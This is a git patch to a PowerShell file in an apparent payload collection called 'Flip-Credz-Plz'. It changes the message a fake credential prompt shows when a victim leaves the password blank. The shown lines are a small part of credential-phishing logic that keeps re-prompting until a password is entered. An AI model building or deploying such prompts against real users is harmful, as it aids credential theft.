From 694e8166c6af54dfb50e092dd7418baff65a29ec Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Tue, 3 Jan 2023 20:29:51 -0600 Subject: [PATCH] Update test.ps1 --- Payloads/Flip-Credz-Plz/test.ps1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-Credz-Plz/test.ps1 b/Payloads/Flip-Credz-Plz/test.ps1 index ec1c40d..f348824 100644 --- a/Payloads/Flip-Credz-Plz/test.ps1 +++ b/Payloads/Flip-Credz-Plz/test.ps1 @@ -58,7 +58,7 @@ while ($form -eq $null) if([string]::IsNullOrWhiteSpace([Net.NetworkCredential]::new('', $cred.Password).Password)) { - Write-Output "Credentials cannot be left blank. Please try again." + [System.Windows.Forms.MessageBox]::Show("Credentials can not be empty!") $form = $null }